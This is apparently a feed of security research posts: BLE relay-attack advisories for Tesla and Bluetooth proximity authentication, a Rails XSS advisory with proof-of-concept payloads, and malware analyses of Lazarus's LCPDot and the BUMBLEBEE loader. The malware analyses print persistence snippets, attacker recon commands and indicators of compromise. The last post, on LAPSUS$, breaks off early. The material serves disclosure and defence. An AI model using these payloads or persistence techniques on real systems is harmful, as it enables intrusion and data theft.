🔒
There are new articles available, click to refresh the page.
Before yesterdayNCC Group Research

Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks

15 May 2022 at 23:54
Vendor: Tesla, Inc.
Vendor URL: https://www.tesla.com
Versions affected: Attack tested with vehicle software v11.0 (2022.8.2 383989fadeea) and iOS app 4.6.1-891 (3784ebe63).
Systems Affected: Attack tested on Model 3. Model Y is likely also affected.
Author: Sultan Qasim Khan <sultan.qasimkhan[at]nccgroup[dot]com>
Risk: <6.8 CVSS v3.1 AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N> An attacker within Bluetooth signal range of a mobile device configured for Phone-as-a-Key use can conduct a relay attack to unlock and operate a vehicle despite the authorized mobile device being out of range of the vehicle.

Summary

The Tesla Model 3 and Model Y employ a Bluetooth Low Energy (BLE) based passive entry system. This system allows users with an authorized mobile device or key fob within a short range of the vehicle to unlock and operate the vehicle, with no user interaction required on the mobile device or key fob. This system infers proximity of the mobile device or key fob based on signal strength (RSSI) and latency measurements of cryptographic challenge-response operations conducted over BLE.

NCC Group has developed a tool for conducting a new type of BLE relay attack operating at the link layer, for which added latency is within the range of normal GATT response timing variation, and which is capable of relaying encrypted link layer communications. This approach can circumvent the existing relay attack mitigations of latency bounding or link layer encryption, and bypass localization defences commonly used against relay attacks that use signal amplification. As the latency added by this relay attack is within the bounds accepted by the Model 3 (and likely Model Y) passive entry system, it can be used to unlock and drive these vehicles while the authorized mobile device or key fob is out of range.

Impact

If an attacker can place a relaying device within BLE signal range of a mobile phone or key fob authorized to access a Tesla Model 3 or Model Y, they can conduct a relay attack to unlock and operate the vehicle.

Neither normal GATT response latency nor successful communications over an encrypted link layer can be used as indications that a relay attack is not in progress. Consequently, conventional mitigations against prior BLE relay attacks are rendered ineffective against link layer relay attacks.

Details

NCC Group has developed a tool for conducting a new type of Bluetooth Low Energy (BLE) relay attack that can forward link-layer responses within a single connection event, and introduces as little as 8 ms of round-trip latency beyond normal operation. As typical connection intervals for this system are 30 ms or longer, and the added latency is within the range of normal response timing variation for BLE devices, the added latency can be made effectively invisible to the vehicle and phone software. Furthermore, this new type of relay attack can relay connections employing BLE link layer encryption, including following encrypted connections through parameter changes (such as changes to the channel map, connection interval, and transmit window offset).

This relay attack tool can be used for any devices communicating over BLE, and is not specific to Tesla vehicles.

Testing on a 2020 Tesla Model 3 running software v11.0 (2022.8.2) with an iPhone 13 mini running version 4.6.1-891 of the Tesla app, NCC Group was able to use this newly developed relay attack tool to unlock and operate the vehicle while the iPhone was outside the BLE range of the vehicle. In the test setup, the iPhone was placed on the top floor at the far end of a home, approximately 25 metres away from the vehicle, which was in the garage at ground level. The phone-side relaying device was positioned in a separate room from the iPhone, approximately 7 metres away from the phone. The vehicle-side relaying device was able to unlock the vehicle when within placed within a radius of approximately 3 metres from the vehicle.

NCC Group has not tested this relay attack against a Model Y or in conjunction with the optional Tesla Model 3/Y BLE key fob. However, based on the similarity of the technologies used, NCC Group expects the same type of relay attack would be possible against these targets, given the use of similar technologies.

During experimentation to identify latency bounds, NCC Group discovered that relay attacks against the Model 3 remained effective with up to 80 ms of round trip latency artificially added beyond the base level of latency introduced by the relaying tool over a local Wi-Fi network. This latency margin should be sufficient for conducting long-distance relay attacks over the internet. However, NCC Group has not attempted any long distance relay attacks against Tesla vehicles.

Recommendation

Users should be educated about the risks of BLE relay attacks, and encouraged to use the PIN to Drive feature. Consider also providing users with an option to disable passive entry. To reduce opportunities for relay attacks, consider disabling passive entry functionality in the mobile app when the mobile device has been stationary for more than a minute. Also consider also having the mobile application report the mobile device’s last known location during the authentication process with the vehicle, so that the vehicle can detect and reject long distance relay attacks.

For reliable prevention of relay attacks in future vehicles, secure ranging using a time-of-flight based measurement system (such as Ultra Wide Band) must be used.

Vendor Communication

April 21, 2022: Disclosure to Tesla Product Security
April 28, 2022: Response from Tesla Product Security stating that relay attacks are a known limitation of the passive entry system.
May 9, 2022: Tesla Product Security notified of NCC Group’s intent to publish research regarding BLE relay attacks and their applicability to Tesla products.
May 15, 2022: Advisory released to public

Thanks to

Jeremy Boone for support and guidance throughout the research process developing this attack.

Editor’s Note (May 15 2022)

This research involves a generic link-layer relay attack on Bluetooth Low Energy, which affects products other than those mentioned here. That advisory was also published today and is available at:
https://research.nccgroup.com/2022/05/15/technical-advisory-ble-proximity-authentication-vulnerable-to-relay-attacks/

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: May 15, 2022
Written by: Sultan Qasim Khan

Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks

15 May 2022 at 22:52
Vendor: Bluetooth SIG, Inc.
Vendor URL: https://www.bluetooth.com
Versions Affected: Specification versions 4.0 to 5.3
Systems Affected: Any systems relying on the presence of a Bluetooth LE connection as confirmation of physical proximity, regardless of whether link layer encryption is used
Author: <Sultan Qasim Khan> <sultan.qasimkhan[at]nccgroup[dot]com>
Risk: An attacker can falsely indicate the proximity of Bluetooth LE (BLE) devices to   one another through the use of a relay attack. This may enable unauthorized access to devices in BLE-based proximity authentication systems.

Summary

Many products implement Bluetooth Low Energy (BLE) based proximity authentication, where the product unlocks or remains unlocked when a trusted BLE device is determined to be nearby. Common examples of such products include automotive Phone-as-a-Key systems, residential smart locks, BLE-based commercial building access control systems, and smartphones and laptops with trusted BLE device functionality. The possibility of relay attacks against BLE proximity authentication has been known for years, but existing public relay attack tooling (based on forwarding GATT requests and responses) introduces detectable levels of latency and is incapable of relaying connections employing link layer encryption. Thus, products commonly attempt to prevent relay attacks by imposing strict GATT response time limits and/or using link layer encryption. Some systems also try to block signal amplification relay attacks through various localization techniques involving triangulation.

NCC Group has developed a tool for conducting a new type of BLE relay attack operating at the link layer, for which added latency is within the range of normal GATT response timing variation, and which is capable of relaying encrypted link layer communications. This approach can circumvent the existing relay attack mitigations of latency bounding or link layer encryption, and bypass localization defences commonly used against relay attacks that use signal amplification.

Impact

If an attacker can place a relaying device within signal range of a target BLE device (Victim Device A) trusted for proximity authentication by another device (Victim Device B), then they can conduct a relay attack to unlock and operate Victim Device B.

Neither normal GATT response latency nor successful communications over an encrypted link layer can be used as indications that a relay attack is not in progress. Consequently, conventional mitigations to prior BLE relay attacks are rendered ineffective against link layer relay attacks.

Details

NCC Group has developed a tool for conducting a new type of Bluetooth Low Energy (BLE) relay attack that can forward link-layer responses within a single connection event and introduces as little as 8 ms of round-trip latency beyond normal operation. As typical connection intervals in proximity authentication system are 30 ms or longer, added latency can generally be limited to a single connection event. With further straightforward refinement of the tool, it would be possible to guarantee that the added response latency is one connection event or less for any connection interval permissible under the Bluetooth specification.

Real BLE devices commonly require multiple connection events to respond to GATT requests or notifications and have inherent variability in their response timing. Thus, the latency introduced by this relay attack falls within the range of normal response timing variation.

Since this relay attack operates at the link layer, it can forward encrypted link layer PDUs. It is also capable of detecting encrypted changes to connection parameters (such as connection interval, WinOffset, PHY mode, and channel map) and continuing to relay connections through parameter changes. Thus, neither link layer encryption nor encrypted connection parameter changes are defences against this type of relay attack.

Recommendation

The Bluetooth Core Specification does not make any claims of relay attack resistance. Furthermore, Section 6 of the Proximity Profile[1] (v1.0.1, updated in 2015) explicitly warns of the possibility of relay attacks, noting that proximity indicated by a BLE connection “should not be used as the only protection of valuable assets.” However, many members of the Bluetooth SIG have produced BLE proximity authentication systems intended for security critical applications, and some make claims of relay attack resistance while still being at risk. Makers of such systems and their applications are also commonly promoted [2],[3],[4],[5] on the Bluetooth SIG Blog despite the documented risks.

NCC Group recommends that the SIG proactively advise its members developing proximity authentication systems about the risks of BLE relay attacks. Moreover, documentation should make clear that relay attacks are practical and must be included in threat models, and that neither link layer encryption nor expectations of normal response timing are defences against relay attacks. Developers should be encouraged to either require user interaction on the mobile device to authorize unlock, or adopt a time-of-flight based secure ranging (distance bounding) solution using technologies such as Ultra-Wide Band (UWB). For existing systems where hardware modification is not feasible, NCC Group recommends that end users be educated about the risks of relay attacks and presented with an option to disable passive entry functionality that relies on inferred proximity alone. Risk can also be reduced by disabling passive unlock functionality when the user’s mobile device has been stationary for more than a minute (as measured by accelerometer readings).

Vendor Communication

April 4, 2022: Disclosure to Bluetooth SIG
April 19, 2022: Response from Bluetooth SIG confirming that relay attacks are a known   risk, and that more accurate ranging mechanisms are under development.
April 19, 2022: Follow up message to Bluetooth SIG clarifying certain details of relay   attack based on questions from the SIG.
May 15, 2022: Advisory released to public

Thanks to

Jeremy Boone for his support and guidance throughout the research process developing this attack.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

References

[1] https://www.bluetooth.com/specifications/specs/proximity-profile-1-0-1/

[2] https://www.bluetooth.com/blog/why-texas-instruments-uses-bluetooth-technology-for-their-digital-key-solutions/

[3] https://www.bluetooth.com/blog/how-alps-alpine-uses-bluetooth-technology-for-secure-digital-key-solutions/

[4] https://www.bluetooth.com/blog/new-bluetooth-application-for-the-automotive-industry/

[5] https://www.bluetooth.com/blog/intelligent-mobility-solution-for-e-motorcycles-achieves-true-peps/

Published date:  May 15 2022
Written by:  Sultan Qasim Khan

Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView tag helpers (CVE-2022-27777)

Vendor: Ruby on Rails
Vendor URL: https://rubyonrails.org
Versions affected: versions prior to 7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1
Operating Systems Affected: ALL
Author: Álvaro Martín Fraguas <alvaro.martin[at]nccgroup[dot]com>
Advisory URLs:
- https://groups.google.com/g/rubyonrails-security/c/Yg2tEh2UUqc
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27777
Accepted commit for the fix in the official master branch:
- https://github.com/rails/rails/commit/649516ce0feb699ae06a8c5e81df75d460cc9a85
Risk: Medium (XSS vulnerability in some cases for some Rails methods).

Summary

Ruby on Rails is a web application framework that follows the Model-view-controller (MVC) pattern. It offers some protections against Cross-site scripting (XSS) attacks in its helpers for the views. Several tag helpers in ActionView::Helpers::FormTagHelper and ActionView::Helpers::TagHelper are vulnerable against XSS because their current protection does not restrict properly the set of characters allowed in the names of tag attributes and in the names of tags.

Impact

In some cases, Ruby on Rails applications that use the aforementioned helpers with user-supplied input are vulnerable to XSS attacks. Through them, it is possible to steal passwords or other private information from the user, substitute parts of the website with fake content, perform scans of the network of the user, etc.

Details

The first group of vulnerabilities is related to the options argument in methods from FormTagHelper like check_box_tag, label_tag, radio_button_tag, select_tag, submit_tag, text_area_tag, text_field_tag, etc. In particular in these 3 cases:

  • When providing prefixed HTML data-* attributes.
  • When providing prefixed HTML aria-* attributes.
  • When providing a hash of other types of non-boolean attributes.

For example:

check_box_tag('thename', 'thevalue', false, data: { malicious_input => 'thevalueofdata' })

In that method call, when the variable malicious_input is controlled in part or completely by a user of the application, an attacker can provide an input that will break free from the tag and execute arbitrary JavaScript code. For some applications, that code can be executed in the browser of a different user visiting the application. A simplified proof of concept with only reflected XSS would be this HTML ERB view file:

<%= check_box_tag('thename', 'thevalue', false, data: { params[:payload] => 'thevalueofdata' }) %>

Followed by a request that included the malicious URL parameter: http://...?payload=something="something"><img src="/nonexistent" onerror="alert(1)"><div class

That example only shows an alert window, but the vulnerability makes it possible to steal passwords or other private information from the user, substitute parts of the website with fake content, attack other websites visited by the user, perform scans of the network of the user, etc. And some applications are probably using more dangerous stored user input instead of URL parameters, allowing attackers to perform stored XSS attacks on other users.

Here is another example with aria-* HTML attributes were the same simple payload can be tested:

check_box_tag('thename', 'thevalue', false, aria: { malicious_input => 'thevalueofaria' })

And finally, another example with other non-boolean attributes:

check_box_tag('thename', 'thevalue', false, malicious_input => 'theothervalue')

This same vulnerable structure can also be attacked successfully in the other methods listed at the beginning of this post: label_tag, radio_button_tag, select_tag, submit_tag, text_area_tag, text_field_tag...

The second group of vulnerabilities is related to the more generic methods tag and content_tag from TagHelper. They are vulnerable in the options argument like the previous group of methods, but they are also vulnerable in their first argument, for the names of the generated tags, using the same kind of attack to break free from the tag and execute arbitrary Javascript code. For example:

  • tag(malicious_input)
  • tag.public_send(malicious_input.to_sym)
  • content_tag(malicious_input)

In the 3 cases, this is an example of a simple payload structure that works:

img%20src=%22/nonexistent%22%20onerror=%22javascript_payload%22

As said before for other examples, the vulnerability makes it possible to steal passwords or other private information from the user, substitute parts of the website with fake content, perform scans of the network of the user, etc.

Recommendation

If possible, update to any of the fixed versions: 7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1

If updating is not an option, apply the patches provided in the official advisory: https://groups.google.com/g/rubyonrails-security/c/Yg2tEh2UUqc

Vendor Communication

2022-01-08 – Issue reported with patches through the official Ruby on Rails disclosure platform.
2022-04-26 – Release of patched Ruby on Rails versions, and official advisory published.
2022-05-06 – NCC Group advisory published.

Thanks to

Finding and fixing the vulnerabilities was the result of a personal research project that was part of the graduate training program at NCC Group. I would like to thank my colleagues at NCC Group for the opportunity to work there and the support they always provide. Especially:

  • Sergio de Miguel as my mentor, line manager and one of the leads of the graduate training program.
  • Daniel Romero as the regional research director in Spain.
  • David Muñoz as a lead of the graduate training program.

Also thanks to the Ruby on Rails core team and other contributors for making such an awesome web application framework, and to everyone who has helped me in my years as a Ruby on Rails developer.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

North Korea’s Lazarus: their initial access trade-craft using social media and social engineering

Authored by: Michael Matthews and Nikolaos Pantazopoulos

tl;dr

This blog post documents some of the actions taken during the initial access phase for an attack attributed to Lazarus, along with analysis of the malware that was utilised during this phase.

The methods used in order to gain access to a victim network are widely reported however, nuances in post-exploitation provide a wealth of information on attack paths and threat hunting material that relate closely to TTP’s of the Lazarus group.

In summary, we identified the following findings:

  • Lazarus used LinkedIn profiles to impersonate employees of other legitimate companies
  • Lazarus communicated with target employees through communication channels such as WhatsApp.
  • Lazarus entices victims to download job adverts (zip files) containing malicious documents that lead to the execution of malware
  • The identified malicious downloader appears to be a variant of LCPDOT
  • Scheduled tasks are utilised as a form of persistence (rundll32 execution from a scheduled task)

Initial Access

In line with what is publicly documented[1], the initial entry revolves heavily around social engineering, with recent efforts involving the impersonation of Lockheed Martin employees with LinkedIn profiles to persuade victims into following up with job opportunities that result in a malicious document being delivered.

In this instance, the domain hosting the document was global-job[.]org, likely attempting to impersonate globaljobs[.]org, a US based government/defence recruitment website. In order to subvert security controls in the recent changes made by Microsoft for Office macros, the website hosted a ZIP file which contained the malicious document.

The document had several characteristics comparable to other Lazarus samples however, due to unknown circumstances, the “shapes” containing the payloads were unavailable and could not be analysed.

Following the execution of the macro document, rundll32.exe is called to execute the DLL C:\programdata\packages.mdb, which then led to the initial command-and-control server call out. Unfortunately, the binary itself was no longer available for analysis however, it is believed that this component led to the LCPDot malware being placed on the victim’s host.

LCPDot

We were able to recover a malicious downloader that was executed as a scheduled task. The identified sample appears to be a variant of LCPDot, and it is attributed to the threat actor ‘Larazus’.

The file in question attempted to blend into the environment, leveraging the ProgramData directory once again C:\ProgramData\Oracle\Java\JavaPackage.dll. However, the file had characteristics that stand out whilst threat hunting:

  • Large file size (60mb+) – likely to bypass anti-virus scanning
  • Time stomping – timestamps copied from CMD.exe
  • DLL owned by a user in the ProgramData directory (Not SYSTEM or Administrator)

To execute LCPDot, a scheduled task was created named “Windows Java Vpn Interface”, attempting to blend into the system with the Java theme. The scheduled task executed the binary but also allowed the threat actor to persist.

The scheduled task was set to run daily with the following parameter passed for execution, running:

    <Exec>
      <Command>c:\windows\system32\rundll32.exe</Command>
      <Arguments>C:\ProgramData\Oracle\Java\JavaPackage.dll,VpnUserInterface</Arguments>
    </Exec>

LCPDot Binary Analysis

The downloader’s malicious core starts in a separate thread and the execution flow is determined based on Windows messages IDs (sent by the Windows API function SendMessage).

In the following sections we describe the most important features that we identified during our analysis.

Initialisation Phase

The initialisation phase takes place in a new thread and the following tasks are performed:

  • Initialisation of class MoscowTownList. This class has the functionality to read/write the configuration.
  • Creation of configuration file on disk. The configuration file is stored under the filename VirtualStore.cab in %APPDATA%\Local folder. The configuration includes various metadata along with the command-and-control servers URLs. The structure that it uses is:
struct Configuration
{
 DWORD Unknown; //Unknown, set to 0 by default. If higher than 20 then it 
                // can cause a 2-hour delay during the network 
                // communication process.
 SYSTEMTIME Variant_SystemTime; // Configuration timestamp created by   
                                // SystemTimeToVariantTime.
 SYSTEMTIME Host_SystemTime; // Configuration timestamp. Updated during
                             // network communication process.
 DWORD Logical_drives_find_flag; // Set to 0 by default
 DWORD Active_sessions_flag; // Set to 0 by default
 DWORD Boot_Time; // Milliseconds since boot time
 char *C2_Data;// Command-and-Control servers’ domains
};

The configuration is encrypted by hashing (SHA-1) a random byte array (16 bytes) and then uses the hash output to derive (CryptDeriveKey) a RC4 key (16 bytes). Lastly it writes to the configuration file the random byte array followed by the encrypted configuration data.

  • Enumeration of logical drives and active logon sessions. The enumeration happens only if specified in the configuration. By default, this option is off. Furthermore, even if enabled, it does not appear to have any effect (e.g. sending them to the command-and-control server).

Once this phase is completed, the downloader starts the network communication with its command-and-control servers.

Network Communication

At this stage, the downloader registers the compromised host to the command-and-control server and then requests the payload to execute. In summary, the following steps are taken:

  • Initialises the classes Taxiroad and WashingtonRoad.
  • Creates a byte array (16 bytes), which is then encoded (base64), and a session ID. Both are sent to the server. The encoded byte array is used later to decrypt the received payload and is added to the body content of the request:
    redirect=Yes&idx=%d&num=%s, where idx holds the compromised host’s boot time value and num has the (BASE64) encoded byte array.
    In addition, the session ID is encoded (BASE64) and added to the following string:
    SESSIONID-%d-202110, where 202110 is the network command ID.
    The above string is encoded again (BASE64) and then added to the SESSIONID header of the POST request.

After registering the compromised host, the server replies with one of the following messages:

  • Validation Success – Bot registered without any issues.
  • Validation Error – An error occurred.

Once the registration process has been completed, the downloader sends a GET request to download the second-stage payload. The received payload is decrypted by hashing (SHA-1) the previously created byte array and then use the resulting hash to derive (CryptDeriveKey) a RC4 key.

Lastly, the decrypted payload is loaded directly into memory and executed in a new thread.

In summary, we identified the following commands (Table 1).

Command ID Description
202110 Register compromised host to the command-and-control server
202111 Request payload from the command-and-control server
Table 1 – Identified network commands

Unused Commands and Functions

One interesting observation is the presence of functions and network commands, which the downloader does not seem to use. Therefore, we concluded that the following network commands are not used by the downloader (at least in this variant) but we do believe that  the operators may use them on the server-side (e.g. in the PHP scripts that the downloader sends data) or the loaded payload does use them (Note: Commands 789020, 789021 and 789022 are by default disabled):

  • 202112 – Sends encrypted data in a POST request. Data context is unknown.
  • 202114 – Sends a POST request with body content ‘Cookie=Enable’.
  • 789020 – Same functionality as command ID 202111.
  • 789021 – Same functionality as command ID 202112.
  • 789022 – Sends a POST request with body content ‘Cookie=Enable’.

Indicators of Compromise

Domains

  • ats[.]apvit[.]com – Legitimate Compromised website
  • bugs-hpsm[.]mobitechnologies[.]com – Legitimate Compromised website
  • global-job[.]org
  • thefrostery[.]co[.]uk – Legitimate Compromised website
  • shoppingbagsdirect[.]com – – Legitimate Compromised website

IP Address

  • 13[.]88[.]245[.]250

Hashes

Javapackage.dll

MD5: AFBCB626B770B1F87FF9B5721D2F3235

SHA1: D25A4F20C0B9D982D63FC0135798384C17226B55

SHA256: FD02E0F5FCF97022AC266A3E54888080F66760D731903FC32DF2E17E6E1E4C64

Virtualstore.cab

MD5: 49C2821A940846BDACB8A3457BE4663C

SHA1: 0A6F762A47557E369DB8655A0D14AB088926E05B

SHA256: F4E314E8007104974681D92267673AC22721F756D8E1925142D9C26DC8A0FFB4

MITRE ATT&CK

Technique ID
Phishing: Spearphishing via Service T1566.003
Scheduled Task/Job: Scheduled Task T1053.005
User Execution: Malicious File T1204.002
Application Layer Protocol T1071.001
MITRE ATT&CK

References

[1] https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/

Adventures in the land of BumbleBee – a new malicious loader

Authored by: Mike Stokkel, Nikolaos Totosis and Nikolaos Pantazopoulos

tl;dr

BUMBLEBEE is a new malicious loader that is being used by several threat actors and has been observed to download different malicious samples. The key points are:

  • BUMBLEBEE is statically linked with the open-source libraries OpenSSL 1.1.0f, Boost (version 1.68). In addition, it is compiled using Visual Studio 2015.
  • BUMBLEBEE uses a set of anti-analysis techniques. These are taken directly from the open-source project [1].
  • BUMBLEBEE has Rabbort.DLL embedded, using it for process injection.
  • BUMBLEBEE has been observed to download and execute different malicious payloads such as Cobalt Strike beacons.

Introduction

In March 2022, Google’s Threat Analysis Group [2] published about a malware strain linked to Conti’s Initial Access Broker, known as BUMBLEBEE. BUMBLEBEE uses a comparable way of distribution that is overlapping with the typical BazarISO campaigns.

In the last months BUMBLEBEE, would use three different distribution methods:

  • Distribution via ISO files, which are created either with StarBurn ISO or PowerISO software, and are bundled along with a LNK file and the initial payload.
  • Distribution via OneDrive links.
  • Email thread hijacking with password protected ZIPs

BUMBLEBEE is currently under heavy development and has seen some small changes in the last few weeks. For example, earlier samples of BUMBLEBEE used the user-agent ‘bumblebee’ and no encryption was applied to the network data. However, this functionality has changed, and recent samples use a hardcoded key as user-agent which is also acting as the RC4 key used for the entire network communication process.

Technical Analysis

Most of the identified samples are protected with what appears to be a private crypter and has only been used for BUMBLEBEE binaries so far. This crypter uses an export function with name SetPath and has not implemented any obfuscation method yet (e.g. strings encryption).

The BUMBLEBEE payload starts off by performing a series of anti-analysis checks, which are taken directly from the open source Khasar project[1]. After these checks passed, BUMBLEBEE proceeds with the command-and-control communication to receive tasks to execute.

Network Communication

BUMBLEBEE’s implemented network communication procedure is quite simple and straightforward. First, the loader picks an (command-and-control) IP address and sends a HTTPS GET request, which includes the following information in a JSON format (encrypted with RC4):

Key Description
client_id A MD5 hash of a UUID value taken by executing the WMI command ‘SELECT * FROM Win32_ComputerSystemProduct’.
group_name A hardcoded value, which represents the group that the bot (compromised host) will be added.
sys_version Windows OS version
client_version Default value that’s set to 1
user_name Username of the current user
domain_name Domain name taken by executing the WMI command ‘SELECT * FROM Win32_ComputerSystem’.
task_state Set to 0 by default. Used only when the network commands ‘ins’ or ‘sdl’ are executed.
task_id Set to 0 by default. Used only when the network commands ‘ins’ or ‘sdl’ are executed.

Once the server receives the request, it replies with the following data in a JSON format:

Key Description
response_status Boolean value, which shows if the server correctly parsed the loader’s request. Set to 1 if successful.
tasks Array containing all the tasks
task Task name
task_id ID of the received task, which is set by the operator(s).
task_data Data for the loader to execute in Base64 encoded format
file_entry_point Potentially represents an offset value. We have not observed this being used either in the binary’s code or during network communication (set to an empty string).

Tasks

Based on the returned tasks from the command-and-control servers, BUMBLEBEE will execute one of the tasks described below. For two of the tasks, shi and dij, BUMBLEBEE uses a list of predefined process images paths:

  • C:\Program Files\Windows Photo Viewer\ImagingDevices.exe
  • C:\Program Files\Windows Mail\wab.exe
  • C:\Program Files\Windows Mail\wabmig.exe
Task name Description
shi Injects task’s data into a new process. The processes images paths are embedded in the binary and a random selection is made
dij Injects task’s data into a new process. The injection method defers from the method used in task ‘dij’. The processes images paths are embedded in the binary [1] and a random selection is made.
dex Writes task’s data into a file named ‘wab.exe’ under the Windows in AppData folder.
sdl Deletes loader’s binary from disk.
ins Adds persistence to the compromised host.

For the persistence mechanism, BUMBLEBEE creates a new directory in the Windows AppData folder with the directory’s name being derived by the client_id MD5 value. Next, BUMBLEBEE copies itself to its new directory and creates a new VBS file with the following content:

Set objShell = CreateObject(“Wscript.Shell”)

objShell.Run “rundll32.exe my_application_path, IternalJob”

Lastly, it creates a scheduled task that has the following metadata (this can differ from sample to sample):

  1. Task name – Randomly generated. Up to 7 characters.
  2. Author – Asus
  3. Description – Video monitor
  4. Hidden from the UI: True
  5. Path: %WINDIR%\\System32\\wscript.exe VBS_Filepath

Similarly with the directory’ name, the new loader’s binary and VBS filenames are derived from the ‘client_id’ MD5 value too.

Additional Observations

This sub-section contains notes that were collected during the analysis phase and worth to be mentioned too.

  • The first iterations of BUMBLEBEE were observed in September 2021 and were using “/get_load” as URI. Later, the samples started using “/gate“. On 19th of April, they switched to “/gates“, replacing the previous URI.
  • The “/get_load” endpoint is still active on the recent infrastructure – this is probably either for backwards compatibility or ignored by the operator(s). Besides this, most of the earlier samples using URI endpoint are uploaded from non-European countries.
  • Considering that BUMBLEBEE is actively being developed on, the operator(s) did not implement a command to update the loader’s binary, resulting the loss of existing infections.
  • It was found via server errors (during network requests and from external parties) that the backend is written in Golang.
  • As mentioned above, every BUMBLEBEE binary has an embedded group tag. Currently, we have observed the following group tags:
VPS1GROUP ALLdll
VPS2GROUP 1804RA
VS2G 1904r
VPS1 2004r
SP1 1904l
RA1104 25html
LEG0704 2504r
AL1204 2704r
RAI1204  
  • As additional payloads, NCC Group’s RIFT has observed mostly Cobalt Strike and Meterpeter being sent as tasks. However, third parties have confirmed the drop of Sliver and Bokbot payloads.
  • While analyzing NCC Group’s RIFT had a case where the command-and-control server sent the same Meterpeter PE file in two different tasks in the same request to be executed. This is probably an attempt to ensure execution of the downloaded payload (Figure 1). There were also cases where the server initially replied with a Cobalt Strike beacon and then followed up with more than two additional payloads, both being Meterpeter. 
Figure 1 – Duplicated received tasks
  • In one case, the downloaded Cobalt Strike beacon was executed in a sandbox environment and revealed the following commands were executed by the operator(s):
    • net group “domain admins” /domain
    • ipconfig /all
    • netstat -anop tcp
    • execution of Mimikatz

Indicators of Compromise

Type Description Value
IPv4 Meterpreter command-and-control server, linked to Group ID 2004r & 25html 23.108.57[.]13
IPv4 Meterpreter command-and-control server, linked to Group ID 2004r & 2504r 130.0.236[.]214
IPv4 Cobalt Strike server, linked to Group ID 1904r 93.95.229[.]160
IPv4 Cobalt Strike server, linked to Group ID 2004r 141.98.80[.]175
IPv4 Cobalt Strike server, linked to Group ID 2504r & 2704r 185.106.123[.]74
IPv4 BUMBLEBEE command-and-control servers 103.175.16[.]45 103.175.16[.]46 104.168.236[.]99 108.62.118[.]236 108.62.118[.]56 108.62.118[.]61 108.62.118[.]62 108.62.12[.]12 116.202.251[.]3 138.201.190[.]52 142.234.157[.]93 142.91.3[.]109 142.91.3[.]11 149.255.35[.]167 154.56.0[.]214 154.56.0[.]216 168.119.62[.]39 172.241.27[.]146 172.241.29[.]169 185.156.172[.]62 192.236.198[.]63 193.29.104[.]176 199.195.254[.]17 199.80.55[.]44 209.141.59[.]96 209.151.144[.]223 213.227.154[.]158 213.232.235[.]105 23.106.160[.]120 23.106.160[.]39 23.227.198[.]217 23.254.202[.]59 23.81.246[.]187 23.82.140[.]133 23.82.141[.]184 23.82.19[.]208 23.83.133[.]1 23.83.133[.]182 23.83.133[.]216 23.83.134[.]110 23.83.134[.]136 28.11.143[.]222 37.72.174[.]9 45.11.19[.]224 45.140.146[.]244 45.140.146[.]30 45.147.229[.]177 45.147.229[.]23 45.147.231[.]107 49.12.241[.]35 71.1.188[.]122 79.110.52[.]191 85.239.53[.]25 89.222.221[.]14 89.44.9[.]135 89.44.9[.]235 91.213.8[.]23 91.90.121[.]73

References

[1] – https://github.com/LordNoteworthy/al-khaser

[2] – https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

LAPSUS$: Recent techniques, tactics and procedures

Authored by: David Brown, Michael Matthews and Rob Smallridge

tl;dr

This post describes the techniques, tactics and procedures we observed during recent LAPSUS$ incidents.

Our findings can be summarised as below:

  • Access and scraping of corporate Microsoft SharePoint sites in order to identify any credentials which may be stored in technical documentation.
  • Access to local password managers and databases to obtain further credentials and escalate privileges.
  • Living of the land – tools such as RVTools to shut down servers and ADExplorer to perform reconnaissance.
  • Cloning of git repositories and extraction of sensitive API Keys.
  • Using compromised credentials to access corporate VPNs.
  • Disruption or destruction to victim infrastructure to hinder analysis and consume defensive resource.

Summary

LAPSUS$ first appeared publicly in December 2021, however, NCC Group first observed LAPSUS$ months prior during an incident response engagement. We believe the group has also operated prior to this date, though perhaps not under the “LAPSUS$” banner.

Over the last 5 months, LAPSUS$ has gained large notoriety with some successful breaches of some large enterprises including, Microsoft, Nvidia, Okta & Samsung. Little is still known about this group with motivations appearing to be for reputation, money and “for the lulz”.

Notifications or responsibility of victims by LAPSUS$ are commonly reported via their telegram channel and in one case a victim’s DNS records were reconfigured to LAPSUS$ controlled domains/websites. However, not all victims or breaches appear to actively be announced via their telegram channel, nor are some victims approached with a ransom. This distinguishes themselves from more traditional ransomware groups who have a clear modus operandi and are clearly financially focused. The result of this is that LAPSUS$ are less predictable which may be why they have seen recent success.

This serves as a reminder for defenders for defence in depth and the need to anticipate different tactics that threat actors may use.

It is also worth mentioning the brazen behaviour of this threat actor and their emboldened attempts at Social Engineering by offering payment for insiders to provide valid credentials.

This tactic is potentially in response to greater home working due to the pandemic which means there is a far larger proportion of employees with VPN access and as such a greater pool of potential employees willing to sell their credentials.

To combat this, organisations need to ensure they have extensive VPN logging capabilities, robust helpdesk ticketing as well as methods to help identify anomalies in VPN access.

It is notable that the majority of LAPSUS$ actions exploit the human element as opposed to technical deficiencies or vulnerabilities. Although potentially viewed as unsophisticated or basic these techniques have been successful, so it is vital that organisations factor in controls and mitigations to address them.

Initial access

Threat Intelligence shows that LAPSUS$ utilise multiple methods to gain Initial access.

